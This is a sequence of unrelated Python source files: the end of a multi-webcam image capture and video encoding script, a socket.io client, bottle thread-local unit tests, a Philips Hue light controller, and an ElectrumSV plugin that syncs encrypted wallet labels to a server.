            fig, update_figure, interval=50, blit=True)
        mng = plt.get_current_fig_manager()
        mng.resize(*mng.window.maxsize())
        plt.show()
def reconcile(queues, write_queue):
    """Gets a list of concurrent images from each view queue.

    This waits for latest images to be available in all view queues,
    then continuously:
    - Creates a list of current images for each view.
    - Writes the list to a queue of image lists to write to disk.

    Runs forever; intended as the target of a worker Process.

    Args:
        queues: A list of `ImageQueues`, holding the latest image from each
            webcam.
        write_queue: A multiprocessing.Queue holding lists of concurrent
            images.
    """
    # Loop forever.
    while True:
        # Wait till all queues have an image.
        # NOTE(review): this is a busy-wait; it spins a core while any view
        # queue is empty.
        if True in [q.empty() for q in queues]:
            continue
        else:
            # Retrieve all views' images.
            latest = [q.get() for q in queues]
            # Copy the list of all concurrent images to the write queue.
            write_queue.put(latest)
def persist(write_queue, view_dirs):
    """Pulls lists of concurrent images off a write queue, writes them to disk.

    Runs forever; intended as the target of a worker Process.

    Args:
        write_queue: A multiprocessing.Queue holding lists of concurrent
            images; one image per view.
        view_dirs: A list of strings, holding the output image directories
            for each view.
    """
    timestep = 0
    while True:
        # Wait till there is work in the queue.
        # NOTE(review): busy-wait; spins a core while the queue is empty.
        if write_queue.empty():
            continue
        # Get a list of concurrent images to write to disk.
        view_ims = write_queue.get()
        for view_idx, image in enumerate(view_ims):
            view_base = view_dirs[view_idx]
            # Assign all concurrent view images the same sequence timestep,
            # zero-padded so lexicographic order matches temporal order.
            fname = os.path.join(view_base, '%s.png' % str(timestep).zfill(10))
            cv2.imwrite(fname, image)
        # Move to the next timestep.
        timestep += 1
def get_image(camera):
    """Capture one frame from `camera` and return it.

    Args:
        camera: An object with a cv2.VideoCapture-style read() method that
            returns a (success, image) pair.
    Returns:
        The captured image (the success flag is discarded).
    """
    _, frame = camera.read()
    return frame
def capture_webcam(camera, display_queue, reconcile_queue):
    """Captures images from simultaneous webcams, writes them to queues.

    Runs forever after a warm-up phase; each captured frame replaces the
    previous one in both single-slot queues.

    Args:
        camera: A cv2.VideoCapture object representing an open webcam stream.
        display_queue: An ImageQueue receiving frames for the live viewer.
        reconcile_queue: An ImageQueue receiving frames for disk persistence.
    """
    # Take some ramp images to allow cams to adjust for brightness etc.
    for i in range(60):
        tf.logging.info('Taking ramp image %d.' % i)
        get_image(camera)
    cnt = 0
    start = time.time()
    while True:
        # Get images for all cameras.
        im = get_image(camera)
        # Replace the current image in the display and reconcile queues.
        display_queue.append(im)
        reconcile_queue.append(im)
        cnt += 1
        current = time.time()
        if cnt % 100 == 0:
            # Periodically report the effective capture frame rate.
            tf.logging.info('Collected %s of video, %d frames at ~%.2f fps.' % (
                timer(start, current), cnt, cnt / (current - start)))
def timer(start, end):
    """Return the span from `start` to `end` formatted as HH:MM:SS.ss."""
    total = end - start
    hours = int(total // 3600)
    minutes = int((total % 3600) // 60)
    seconds = total % 60
    return '{:0>2}:{:0>2}:{:05.2f}'.format(hours, minutes, seconds)
def display_webcams(display_queues):
    """Run a WebcamViewer over the given queues; blocks in its UI loop."""
    WebcamViewer(display_queues).run()
def create_vids(view_dirs, seqname):
    """Creates one video per view per sequence.

    Encodes each view's image directory into an mp4 with mencoder, and
    optionally composes a side-by-side debug video from two views.

    Args:
        view_dirs: List of per-view image directories.
        seqname: Name of the sequence being encoded.
    Returns:
        A (vidpaths, debugpath) tuple: the per-view video paths and the debug
        video path (None when --debug_vids is off).
    """
    vidbase = os.path.join(FLAGS.viddir, FLAGS.dataset, FLAGS.mode)
    if not os.path.exists(vidbase):
        os.makedirs(vidbase)
    vidpaths = []
    for idx, view_dir in enumerate(view_dirs):
        vidname = os.path.join(vidbase, '%s_view%d.mp4' % (seqname, idx))
        encode_vid_cmd = r'mencoder mf://%s/*.png \
    -mf fps=29:type=png \
    -ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell \
    -oac copy -o %s' % (view_dir, vidname)
        os.system(encode_vid_cmd)
        vidpaths.append(vidname)
    debugpath = None
    if FLAGS.debug_vids:
        # Bug fix: debug_lhs_view/debug_rhs_view are DEFINE_string flags, so
        # they must be cast to int before being used as list indices
        # (indexing a list with a str raises TypeError).
        lhs = vidpaths[int(FLAGS.debug_lhs_view)]
        rhs = vidpaths[int(FLAGS.debug_rhs_view)]
        debug_base = os.path.join('%s_debug' % FLAGS.viddir, FLAGS.dataset,
                                  FLAGS.mode)
        if not os.path.exists(debug_base):
            os.makedirs(debug_base)
        debugpath = '%s/%s.mp4' % (debug_base, seqname)
        os.system(r"avconv \
    -i %s \
    -i %s \
    -filter_complex '[0:v]pad=iw*2:ih[int];[int][1:v]overlay=W/2:0[vid]' \
    -map [vid] \
    -c:v libx264 \
    -crf 23 \
    -preset veryfast \
    %s" % (lhs, rhs, debugpath))
    return vidpaths, debugpath
def setup_paths():
    """Sets up the necessary paths to collect videos.

    Returns:
        A (view_dirs, vid_paths, debug_path) tuple: per-view image
        directories, per-view output video paths, and the debug video path
        (None when --debug_vids is off).
    """
    assert FLAGS.dataset
    assert FLAGS.mode
    assert FLAGS.num_views
    # Directory holding the final per-view images for this sequence.
    tmp_imagedir = os.path.join(FLAGS.tmp_imagedir, FLAGS.dataset, FLAGS.mode)
    if not os.path.exists(tmp_imagedir):
        os.makedirs(tmp_imagedir)
    # Base directory holding all sequence videos.
    vidbase = os.path.join(FLAGS.viddir, FLAGS.dataset, FLAGS.mode)
    if not os.path.exists(vidbase):
        os.makedirs(vidbase)
    # One directory per concurrent view, plus the sequence name.
    view_dirs, seqname = get_view_dirs(vidbase, tmp_imagedir)
    # One output video path per view.
    vid_paths = [os.path.join(vidbase, '%s_view%d.mp4' % (seqname, idx))
                 for idx, _ in enumerate(view_dirs)]
    # Optionally build the debug-video path.
    debug_path = None
    if FLAGS.debug_vids:
        debug_base = os.path.join('%s_debug' % FLAGS.viddir, FLAGS.dataset,
                                  FLAGS.mode)
        if not os.path.exists(debug_base):
            os.makedirs(debug_base)
        debug_path = '%s/%s.mp4' % (debug_base, seqname)
    return view_dirs, vid_paths, debug_path
def get_view_dirs(vidbase, tmp_imagedir):
    """Creates and returns one view directory per webcam, plus the seq name.

    Args:
        vidbase: Directory of existing sequence videos (used to pick the next
            integer sequence name).
        tmp_imagedir: Base directory the per-view image dirs are created in.
    Returns:
        A (view_dirs, seqname) tuple.
    """
    # Use the flag-provided sequence name, or auto-increment the latest
    # integer-named sequence found in the video directory.
    if FLAGS.seqname:
        seqname = FLAGS.seqname
    else:
        existing = os.listdir(vidbase)
        if not existing:
            # No videos yet: this is the first sequence.
            seqname = '0'
        else:
            indices = [name.split('_')[0] for name in existing]
            seqname = str(max(map(int, indices)) + 1)
        tf.logging.info('No seqname specified, using: %s' % seqname)
    view_dirs = []
    for v in range(FLAGS.num_views):
        d = os.path.join(tmp_imagedir, '%s_view%d' % (seqname, v))
        if not os.path.exists(d):
            os.makedirs(d)
        view_dirs.append(d)
    return view_dirs, seqname
def get_cameras():
    """Opens cameras using cv2, ensures they can take images.

    Returns:
        A list of opened cv2.VideoCapture objects, one per webcam port.
    Raises:
        ValueError: If the webcams cannot be connected or reconnected.
    """
    # Try to get free webcam ports.
    # Bug fix: materialize the ports as a list. Under Python 3, `map` is a
    # one-shot iterator and `range` is lazy; `ports` is iterated a second
    # time in the retry below, where an exhausted iterator would silently
    # produce an empty camera list (and a vacuously passing check).
    if FLAGS.webcam_ports:
        ports = list(map(int, FLAGS.webcam_ports.split(',')))
    else:
        ports = list(range(FLAGS.num_views))
    cameras = [cv2.VideoCapture(i) for i in ports]
    if not all([i.isOpened() for i in cameras]):
        try:
            # Try to find and kill hanging cv2 process_ids.
            output = subprocess.check_output(['lsof -t /dev/video*'], shell=True)
            # Bug fix: check_output returns bytes on Python 3; decode before
            # splitting on '\n' (bytes.split(str) raises TypeError).
            output = output.decode('utf-8')
            tf.logging.info('Found hanging cv2 process_ids: \n')
            tf.logging.info(output)
            tf.logging.info('Killing hanging processes...')
            for process_id in output.split('\n')[:-1]:
                subprocess.call(['kill %s' % process_id], shell=True)
            time.sleep(3)
            # Recapture webcams.
            cameras = [cv2.VideoCapture(i) for i in ports]
        except subprocess.CalledProcessError:
            raise ValueError(
                'Cannot connect to cameras. Try running: \n'
                'ls -ltrh /dev/video* \n '
                'to see which ports your webcams are connected to. Then hand those '
                'ports as a comma-separated list to --webcam_ports, e.g. '
                '--webcam_ports 0,1')
    # Verify each camera is able to capture images.
    # NOTE(review): assert is stripped under python -O; kept for behavior
    # compatibility with the original.
    ims = [get_image(camera) for camera in cameras]
    assert False not in [i is not None for i in ims]
    return cameras
def launch_images_to_videos(view_dirs, vid_paths, debug_path):
    """Launch job in separate process to convert images to videos.

    Builds a shell command line for images_to_videos.py and starts it
    asynchronously (note the trailing '&'); returns immediately without
    waiting for the conversion to finish.

    Args:
        view_dirs: List of per-view image directories to convert.
        vid_paths: List of output video paths, one per view.
        debug_path: Path for the debug video, or falsy to skip it.
    """
    f = 'learning/brain/research/tcn/dataset/images_to_videos.py'
    cmd = ['python %s ' % f]
    cmd += ['--view_dirs %s ' % ','.join(i for i in view_dirs)]
    cmd += ['--vid_paths %s ' % ','.join(i for i in vid_paths)]
    cmd += ['--debug_path %s ' % debug_path]
    cmd += ['--debug_lhs_view %s ' % FLAGS.debug_lhs_view]
    cmd += ['--debug_rhs_view %s ' % FLAGS.debug_rhs_view]
    cmd += [' & ']
    cmd = ''.join(i for i in cmd)
    # Call images_to_videos asynchronously; its output is discarded.
    fnull = open(os.devnull, 'w')
    subprocess.Popen([cmd], stdout=fnull, stderr=subprocess.STDOUT, shell=True)
    for p in vid_paths:
        tf.logging.info('Writing final video to: %s' % p)
    if debug_path:
        tf.logging.info('Writing debug video to: %s' % debug_path)
def main(_):
    """Captures synchronized webcam images until Ctrl-C, then encodes videos."""
    # Initialize the camera capture objects.
    cameras = get_cameras()
    # Get one output directory per view.
    view_dirs, vid_paths, debug_path = setup_paths()
    try:
        # Wait for user input.
        try:
            tf.logging.info('About to write to:')
            for v in view_dirs:
                tf.logging.info(v)
            input('Press Enter to continue...')
        except SyntaxError:
            # On Python 2 input() evaluates the line; a bare Enter raises
            # SyntaxError, which here simply means "continue".
            pass
        # Create a queue per view for displaying and saving images.
        display_queues = [ImageQueue() for _ in range(FLAGS.num_views)]
        reconcile_queues = [ImageQueue() for _ in range(FLAGS.num_views)]
        # Create a queue for collecting all tuples of multi-view images to
        # write to disk.
        write_queue = multiprocessing.Queue()
        processes = []
        # Create a process to display collected images in real time.
        processes.append(Process(target=display_webcams, args=(display_queues,)))
        # Create a process to collect the latest simultaneous images from each view.
        processes.append(Process(
            target=reconcile, args=(reconcile_queues, write_queue,)))
        # Create a process to write the reconciled image tuples to disk.
        processes.append(Process(
            target=persist, args=(write_queue, view_dirs,)))
        # One capture process per camera, feeding both queues.
        for (cam, dq, rq) in zip(cameras, display_queues, reconcile_queues):
            processes.append(Process(
                target=capture_webcam, args=(cam, dq, rq,)))
        for p in processes:
            p.start()
        for p in processes:
            p.join()
    except KeyboardInterrupt:
        # Ctrl-C ends the recording session: tear everything down, then
        # kick off the asynchronous video encoding.
        # Close the queues.
        for q in display_queues + reconcile_queues:
            q.close()
        # Release the cameras.
        for cam in cameras:
            cam.release()
        # Launch images_to_videos script asynchronously.
        launch_images_to_videos(view_dirs, vid_paths, debug_path)
        try:
            sys.exit(0)
        except SystemExit:
            # Hard-exit so lingering child processes cannot keep the
            # interpreter alive.
            os._exit(0)  # pylint: disable=protected-access
# Script entry point: tf.app parses the flags and invokes main().
if __name__ == '__main__':
    tf.app.run()
|
socketio_client.py
|
"""
SocketIOClient
==============
Example::
from amitu.socketio_client import SocketIOClient
sock = SocketIOClient("localhost", 8081)
def my_connect():
print("opened!")
sock.emit("browser", "data!")
sock.on("server", on_server)
def on_server(data):
        print(data)
sock.on("connect", my_connect)
sock.run()
See ThreadedSocketIOClient below for a different usage example.
"""
import amitu.websocket_client
import httplib
import json
import time
import socket
import threading
from Queue import Queue
import logging
logger = logging.getLogger(__name__)
class SocketIOPacket(object):
    """Base class for socket.io protocol packets.

    Subclasses define a ``type`` attribute (the wire-level packet type
    digit); instances carry an id, an endpoint and an optional payload.
    """

    def __init__(self, id="", endpoint="", data=None):
        """Store the packet's id, endpoint and raw data payload."""
        self.id = id
        self.endpoint = endpoint
        self.data = data

    def __repr__(self):
        """Human-readable summary used for logging/debugging."""
        fields = (self.__class__.__name__, self.id, self.endpoint, self.data)
        return u"%s: id=<%s> endpoint=<%s> data=<%s>" % fields

    def __unicode__(self):
        """Serialize to the socket.io wire format ``type:id:endpoint[:data]``."""
        head = u"%s:%s:%s" % (self.type, self.id, self.endpoint)
        return head if self.data is None else head + u":" + self.data
class DisconnectPacket(SocketIOPacket):
    # socket.io packet type "0": disconnect notification.
    type = "0"
class ConnectPacket(SocketIOPacket):
    # socket.io packet type "1": connection acknowledgement.
    type = "1"
class HeartbeatPacket(SocketIOPacket):
    # socket.io packet type "2": keep-alive heartbeat.
    type = "2"
class MessagePacket(SocketIOPacket):
    # socket.io packet type "3": plain-text message.
    type = "3"
class JSONMessagePacket(SocketIOPacket):
    """socket.io packet type "4": a message whose payload is JSON.

    Either ``data`` (the JSON text) or ``payload`` (the decoded object)
    may be given; the missing one is derived from the other.
    """
    type = "4"
    def __init__(self, id="", endpoint="", data=None, payload=None):
        if payload is None:
            payload = json.loads(data)
        if data is None:
            data = json.dumps(payload)
        super(JSONMessagePacket, self).__init__(id, endpoint, data)
        self.payload = payload
class EventPacket(SocketIOPacket):
    """socket.io packet type "5": a named event with a JSON args list.

    Either the raw JSON ``data`` or the decoded ``name``/``args`` pair may
    be supplied; the missing representation is derived from the other.
    """
    type = "5"
    def __init__(self, id="", endpoint="", data=None, name=None, args=None):
        if name is None:
            d = json.loads(data)
            name = d["name"]
            args = d["args"]
        if data is None:
            d = {"name": name, "args": args}
            data = json.dumps(d)
        super(EventPacket, self).__init__(id, endpoint, data)
        self.name, self.args = name, args
    def __repr__(self):
        return u"%s: id=<%s> endpoint=<%s> name=<%s> args=<%s>" % (
            self.__class__.__name__, self.id, self.endpoint,
            self.name, self.args
        )
class ACKPacket(SocketIOPacket):
    # socket.io packet type "6": acknowledgement of a received packet.
    type = "6"
class ErrorPacket(SocketIOPacket):
    """socket.io packet type "7": an error carrying a reason and advice.

    On the wire the data payload is ``reason+advice``; either the raw
    ``data`` string or the split-out ``reason``/``advice`` pair may be
    passed to the constructor.
    """
    type = "7"
    def __init__(
        self, id="", endpoint="", data=None, reason=None, advice=None
    ):
        if reason is None:
            reason, advice = data.split("+", 1)
        if data is None:
            # BUGFIX: join with "+" (not ":") so a constructed packet
            # round-trips through the split("+", 1) above and matches the
            # socket.io error payload format "reason+advice".
            data = u"%s+%s" % (reason, advice)
        super(ErrorPacket, self).__init__(id, endpoint, data)
        self.reason, self.advice = reason, advice
    def __repr__(self):
        # BUGFIX: the original format string had six %s placeholders for
        # five values, so repr() always raised TypeError.
        return u"%s: id=<%s> endpoint=<%s> reason=<%s> advice=<%s>" % (
            self.__class__.__name__, self.id, self.endpoint,
            self.reason, self.advice
        )
class NoopPacket(SocketIOPacket):
    # socket.io packet type "8": no-op, used to keep connections open.
    type = "8"
def parse_message(raw):
    """Parse a raw socket.io frame into the matching packet object.

    Frames look like ``type:id:endpoint[:data]``; the data part may itself
    contain colons, hence the maxsplit of 3.
    """
    parts = raw.split(":", 3)
    type = parts[0]
    id = parts[1]
    endpoint = parts[2]
    if len(parts) == 4:
        data = parts[3]
    else:
        data = None
    # Dispatch on the wire-level type digit to the matching packet class.
    return {
        "0": DisconnectPacket, "1": ConnectPacket, "2": HeartbeatPacket,
        "3": MessagePacket, "4": JSONMessagePacket, "5": EventPacket,
        "6": ACKPacket, "7": ErrorPacket, "8": NoopPacket,
    }[type](id, endpoint, data)
class SocketIOClient(amitu.websocket_client.WebSocket):
    """Minimal socket.io 0.x client built on the amitu websocket client.

    Handlers are registered with on(name, callback) and invoked via
    fire(); heartbeat packets are answered automatically.
    """
    def __init__(self, server, port, protocol="ws", *args, **kw):
        # The websocket superclass is initialized lazily in run(), once
        # the socket.io handshake has produced a session key.
        self.server = server
        self.port = port
        self.args = args
        self.kw = kw
        self.protocol = protocol
        # Maps event name -> list of callbacks.
        self.handlers = {}
    def run(self):
        """Perform the socket.io HTTP handshake, then run the ws loop."""
        conn = httplib.HTTPConnection(self.server + ":" + str(self.port))
        conn.request('GET', '/socket.io/1/')
        r = conn.getresponse().read()
        # Handshake response is "<session-key>:<heartbeat>:<timeout>:...".
        hskey = r.split(":")[0]
        super(SocketIOClient, self).__init__(
            '%s://%s:%s/socket.io/1/websocket/%s' % (
                self.protocol, self.server, self.port, hskey
            ), *self.args, **self.kw
        )
        super(SocketIOClient, self).run()
    def on(self, name, callback):
        """Register *callback* to be invoked when event *name* fires."""
        self.handlers.setdefault(name, []).append(callback)
    def fire(self, name, *args, **kw):
        """Invoke every callback registered for event *name*."""
        for callback in self.handlers.get(name, []):
            callback(*args, **kw)
    def emit(self, name, args):
        """Send a socket.io event packet with a single-argument payload."""
        self.send(EventPacket(name=name, args=[args]))
    def onopen(self):
        # Websocket connected: surface it as a socket.io "connect" event.
        self.fire("connect")
    def onmessage(self, msg):
        # Raw frames are exposed via the "message" event before parsing.
        self.fire("message", msg)
        packet = parse_message(msg)
        # Echo heartbeats so the server keeps the session alive.
        if isinstance(packet, HeartbeatPacket):
            self.send(HeartbeatPacket())
        if isinstance(packet, EventPacket):
            self.fire(packet.name, packet.args[0])
    def ontimeout(self):
        # Delegate to registered "timeout" handlers when present;
        # otherwise close the socket and terminate the process.
        handlers = self.handlers.get("timeout")
        if handlers:
            for handler in handlers:
                handler()
        else:
            self.sock.close()
            exit(1)
class ThreadedSocketIOClient(SocketIOClient):
    """The upstream amitu socket client can only send one message,
    and then shuts down the connection.
    This threaded client can handle a sequential conversation consisting
    of multiple messages.
    Example usage:
        rcvd = []
        def myfunc(msg):
            rcvd.append(msg)
            # do something more useful
        sockio = ThreadedSocketIOClient(server, port)
        # first message
        socketio('5:::{"foo":"bar"}', myfunc)
        # second message
        socketio('5:::{"bar":"baz"}', myfunc)
        # wait for callbacks
        while len(rcvd) < 2:
            time.sleep(1)
        # shutdown
        sockio.close()
    """
    def __init__(self, server, port, protocol="ws", *args, **kwargs):
        # Queue of (message, callback) pairs; (None, None) is the shutdown
        # sentinel pushed by close().
        self._q = Queue()
        self.msg = None
        self._callback = None
        # Worker thread running the websocket loop; created lazily on the
        # first __call__.
        self._t = None
        super(ThreadedSocketIOClient, self
              ).__init__(server, port, protocol, *args, **kwargs)
    def __call__(self, msg, callback):
        """Queue *msg* for sending; *callback* receives the reply."""
        logger.debug("%s.__call__::%s, %s",
                     self.__class__.__name__, msg, callback)
        self._q.put((msg, callback))
        if self._t is None:
            self.runloop()
    def callback(self, msg):
        # Deliver a parsed reply to the pending callback, then block on
        # the queue again for the next (msg, callback) pair.
        logger.debug("%s.callback::calling %s with msg=%s",
                     self.__class__.__name__, self._callback, msg)
        if self._callback is not None:
            self._callback(msg)
            # re-loop
            self.runloop()
        else:
            raise AttributeError("No callback to handle message::%s" % msg)
    def runloop(self):
        logger.debug("%s.runloop",
                     self.__class__.__name__)
        # blocks until next message or terminator
        self.msg, self._callback = self._q.get()
        logger.debug("%s.runloop::callback set to %s",
                     self.__class__.__name__, self._callback)
        # initial loop
        if self._t is None:
            self._t = threading.Thread(target=self._run)
            self._t.start()
        # terminator
        elif self.msg is None:
            self._close()
        else:
            self.send_message(self.msg)
    def _run(self):
        # Worker-thread entry point: register handlers, then run the
        # blocking websocket loop inherited from SocketIOClient.
        self.on("connect", self.my_connect)
        self.on("message", self.my_message)
        self.on("disconnect", self.my_disconnect)
        self.on("error", self.my_error)
        self.on("timeout", self.my_timeout)
        # fixes connection reset by peer errors
        time.sleep(0.001)
        self.run()
    def my_error(self, error):
        self.my_disconnect('dikke error %s ik kap ermee ait' % error)
    def my_timeout(self):
        self.my_disconnect('timeout yo, ik kap ermee')
    def my_connect(self):
        # Connected: send the message that triggered this connection.
        self.send_message(self.msg)
    def send_message(self, msg):
        logger.debug("%s.send_message::%s",
                     self.__class__.__name__, msg)
        self.send(msg)
    def my_message(self, msg):
        logger.debug("%s.my_message::> %s",
                     self.__class__.__name__, msg)
        message = msg.split(':')
        # Only type-5 (event) frames carry a payload we deliver; rejoin
        # the tail since the JSON body may itself contain colons.
        if message[0] == "5":
            my_msg = json.loads(':'.join(message[3:]))
            self.callback(my_msg)
    def my_disconnect(self, msg=None):
        self.close()
    def close(self):
        """Request shutdown by queuing the (None, None) sentinel."""
        logger.debug("%s.close",
                     self.__class__.__name__)
        self._q.put((None, None))
    def _close(self):
        # Actual socket teardown, executed from the worker thread.
        self.sock.settimeout(1)
        self.sock.shutdown(socket.SHUT_RDWR)
        # no sys.exit!
    def on_server(data):
        # NOTE(review): defined without `self` -- looks like a module-level
        # stub that ended up inside the class; confirm intended scope.
        pass
    def onclose(self):
        logger.debug("%s.onclose" %
                     (self.__class__.__name__))
        super(ThreadedSocketIOClient, self).onclose()
|
test_contextlocals.py
|
# -*- coding: utf-8 -*-
'''
Some objects are context-local, meaning that they have different values depending on the context they are accessed from. A context is currently defined as a thread.
'''
import unittest
import bottle
import threading
def run_thread(func):
    """Execute *func* in a freshly started thread and block until it ends."""
    worker = threading.Thread(target=func)
    worker.start()
    worker.join()
class TestThreadLocals(unittest.TestCase):
    """Verify that bottle's request/response objects are thread-local."""
    def test_request(self):
        # Bind a different environ in a worker thread and in the main
        # thread; neither binding must leak into the other.
        e1 = {'PATH_INFO': '/t1'}
        e2 = {'PATH_INFO': '/t2'}
        def run():
            bottle.request.bind(e2)
            self.assertEqual(bottle.request.path, '/t2')
        bottle.request.bind(e1)
        self.assertEqual(bottle.request.path, '/t1')
        run_thread(run)
        # The worker thread's bind(e2) must not replace our binding.
        self.assertEqual(bottle.request.path, '/t1')
    def test_response(self):
        # Same check for the response object's headers.
        def run():
            bottle.response.bind()
            bottle.response.content_type='test/thread'
            self.assertEqual(bottle.response.headers['Content-Type'], 'test/thread')
        bottle.response.bind()
        bottle.response.content_type='test/main'
        self.assertEqual(bottle.response.headers['Content-Type'], 'test/main')
        run_thread(run)
        # The worker thread's content type must not leak into ours.
        self.assertEqual(bottle.response.headers['Content-Type'], 'test/main')
if __name__ == '__main__': #pragma: no cover
unittest.main()
|
hue.py
|
from phue import Bridge
import threading
import random
import time
class HueController:
    """Controls a group of Philips Hue lights through a phue Bridge.

    All bridge operations are best-effort: failures to reach the bridge
    are swallowed so lighting problems never crash the caller.
    """

    def __init__(self):
        self.bridge = Bridge('192.168.1.107')  # Enter bridge IP here.
        # If running for the first time, press button on bridge and run
        # with b.connect() uncommented
        # bridge.connect()
        self.lights = self.bridge.get_light_objects()
        for light in self.lights:
            print(light.brightness)
            print(light.xy)
        self.state = 'off'
        self.on_off_toggle = False
        # Flag polled by the blink worker; initialized here so that
        # stop_blink()/set_off() are safe before any blink was started.
        self.keep_blinking = False
        self.blink_thread = None

    def set_off(self):
        """Stop any blinking and turn the light group off (best effort)."""
        try:
            self.stop_blink()
            self.bridge.set_group(1, 'on', False)
            self.state = 'off'
        except Exception:
            # Deliberate best-effort: ignore bridge/network failures.
            pass

    def set_on(self):
        """Stop blinking and set the group to warm white, full brightness."""
        try:
            self.stop_blink()
            self.bridge.set_group(1, 'on', True)
            self.bridge.set_group(1, 'xy', [0.4578, 0.41])
            self.bridge.set_group(1, 'brightness', 254)
            self.state = 'photo'
        except Exception:
            pass

    def start_blink(self):
        """Start the background blink loop in a worker thread."""
        try:
            self.keep_blinking = True
            # BUGFIX: Thread.start() returns None, so the original
            # `threading.Thread(...).start()` assignment never kept a
            # reference to the thread. Keep the Thread object instead.
            self.blink_thread = threading.Thread(target=self._blink)
            self.blink_thread.start()
        except Exception:
            pass

    def stop_blink(self):
        """Ask the blink worker (if any) to stop after its current cycle."""
        self.keep_blinking = False

    def _blink(self):
        """Worker loop: alternate all lights between random colors and off."""
        try:
            while(self.keep_blinking):
                for light in self.lights:
                    if self.on_off_toggle:
                        light.transitiontime = 0
                        light.on = True
                        light.xy = [random.random(), random.random()]
                    else:
                        light.transitiontime = 0
                        light.on = False
                    time.sleep(0.05)
                self.on_off_toggle = not self.on_off_toggle
                if not self.keep_blinking:
                    break
        except Exception:
            pass
class HueStubController:
    """Drop-in stand-in for HueController that only prints a trace line."""

    def _trace(self, message):
        # Single choke point for the fake controller's stdout logging.
        print(message)

    def __init__(self):
        self._trace('hue - init')

    def set_off(self):
        self._trace('hue - set off')

    def set_on(self):
        self._trace('hue - set on')

    def start_blink(self):
        self._trace('hue - start blink')

    def stop_blink(self):
        self._trace('hue - stop blink')
|
labels.py
|
import base64
import json
import hashlib
import logging
import requests
import threading
from electrumsv.bitcoin import aes_decrypt_with_iv, aes_encrypt_with_iv
from electrumsv.plugin import BasePlugin, hook
logger = logging.getLogger("plugin.labels")
class LabelsPlugin(BasePlugin):
    """Syncs wallet labels with the external labels.bauerj.eu service.

    Labels are encrypted client-side (AES, keyed off the wallet's master
    public key fingerprint) before upload, and decrypted on pull.
    """
    def __init__(self, parent, config, name):
        BasePlugin.__init__(self, parent, config, name)
        self.target_host = 'labels.bauerj.eu'
        # wallet -> (aes password, iv, wallet_id); filled by start_wallet()
        # and cleared by stop_wallet().
        self.wallets = {}
    def encode(self, wallet, msg):
        """AES-encrypt *msg* with the wallet's key and base64-encode it."""
        password, iv, wallet_id = self.wallets[wallet]
        encrypted = aes_encrypt_with_iv(password, iv, msg.encode('utf8'))
        return base64.b64encode(encrypted).decode()
    def decode(self, wallet, message):
        """Reverse of encode(): base64-decode, then AES-decrypt."""
        password, iv, wallet_id = self.wallets[wallet]
        decoded = base64.b64decode(message)
        decrypted = aes_decrypt_with_iv(password, iv, decoded)
        return decrypted.decode('utf8')
    def get_nonce(self, wallet):
        # nonce is the nonce to be used with the next change
        nonce = wallet.storage.get('wallet_nonce')
        if nonce is None:
            nonce = 1
            self.set_nonce(wallet, nonce)
        return nonce
    def set_nonce(self, wallet, nonce):
        """Persist the wallet's sync nonce."""
        logger.debug("set %s nonce to %s", wallet.basename(), nonce)
        wallet.storage.put("wallet_nonce", nonce)
    @hook
    def set_label(self, wallet, item, label):
        """Hook: upload one (item, label) pair in a background thread."""
        if not wallet in self.wallets:
            return
        if not item:
            return
        nonce = self.get_nonce(wallet)
        wallet_id = self.wallets[wallet][2]
        bundle = {"walletId": wallet_id,
                  "walletNonce": nonce,
                  "externalId": self.encode(wallet, item),
                  "encryptedLabel": self.encode(wallet, label)}
        # NOTE(review): Thread.setDaemon() is deprecated in modern Python;
        # `t.daemon = True` is the current spelling.
        t = threading.Thread(target=self.do_request,
                             args=["POST", "/label", False, bundle])
        t.setDaemon(True)
        t.start()
        # Caller will write the wallet
        self.set_nonce(wallet, nonce + 1)
    def do_request(self, method, url = "/labels", is_batch=False, data=None):
        """Perform one HTTPS request against the label server.

        Raises BaseException on non-200 responses or server-side errors.
        """
        url = 'https://' + self.target_host + url
        kwargs = {'headers': {}}
        if method == 'GET' and data:
            kwargs['params'] = data
        elif method == 'POST' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['Content-Type'] = 'application/json'
        response = requests.request(method, url, **kwargs)
        if response.status_code != 200:
            raise BaseException(response.status_code, response.text)
        response = response.json()
        if "error" in response:
            raise BaseException(response["error"])
        return response
    def push_thread(self, wallet):
        """Encrypt and upload every label of *wallet* in a single batch."""
        wallet_id = self.wallets[wallet][2]
        bundle = {"labels": [],
                  "walletId": wallet_id,
                  "walletNonce": self.get_nonce(wallet)}
        for key, value in wallet.labels.items():
            try:
                encoded_key = self.encode(wallet, key)
                encoded_value = self.encode(wallet, value)
            except:
                logger.error('cannot encode %r %r', key, value)
                continue
            bundle["labels"].append({'encryptedLabel': encoded_value,
                                     'externalId': encoded_key})
        self.do_request("POST", "/labels", True, bundle)
    def pull_thread(self, wallet, force):
        """Download and apply label changes since our last known nonce.

        With force=True everything is re-fetched and local labels are
        overwritten; otherwise only missing labels are filled in.
        """
        wallet_id = self.wallets[wallet][2]
        nonce = 1 if force else self.get_nonce(wallet) - 1
        logger.debug("asking for labels since nonce %s", nonce)
        try:
            response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
            if response["labels"] is None:
                logger.debug('no new labels')
                return
            result = {}
            for label in response["labels"]:
                try:
                    key = self.decode(wallet, label["externalId"])
                    value = self.decode(wallet, label["encryptedLabel"])
                except:
                    # Undecryptable entries (e.g. foreign keys) are skipped.
                    continue
                try:
                    json.dumps(key)
                    json.dumps(value)
                except:
                    logger.error('no json %s', key)
                    continue
                result[key] = value
            for key, value in result.items():
                if force or not wallet.labels.get(key):
                    wallet.labels[key] = value
            # NOTE(review): len(response) counts the response dict's keys,
            # not the labels; len(response["labels"]) looks intended.
            logger.debug("received %d labels", len(response))
            # do not write to disk because we're in a daemon thread
            wallet.storage.put('labels', wallet.labels)
            self.set_nonce(wallet, response["nonce"] + 1)
            self.on_pulled(wallet)
        except Exception as e:
            logging.exception("could not retrieve labels")
    def on_pulled(self, _wallet):
        """Subclass hook invoked after a successful pull."""
        raise NotImplementedError()
    def start_wallet(self, wallet):
        """Derive the wallet's key material and kick off an initial pull."""
        nonce = self.get_nonce(wallet)
        logger.debug("wallet %s nonce is %s", wallet.basename(), nonce)
        mpk = wallet.get_fingerprint()
        if not mpk:
            return
        mpk = mpk.encode('ascii')
        # Deterministic key material derived from the wallet fingerprint.
        password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
        iv = hashlib.sha256(password).digest()[:16]
        wallet_id = hashlib.sha256(mpk).hexdigest()
        self.wallets[wallet] = (password, iv, wallet_id)
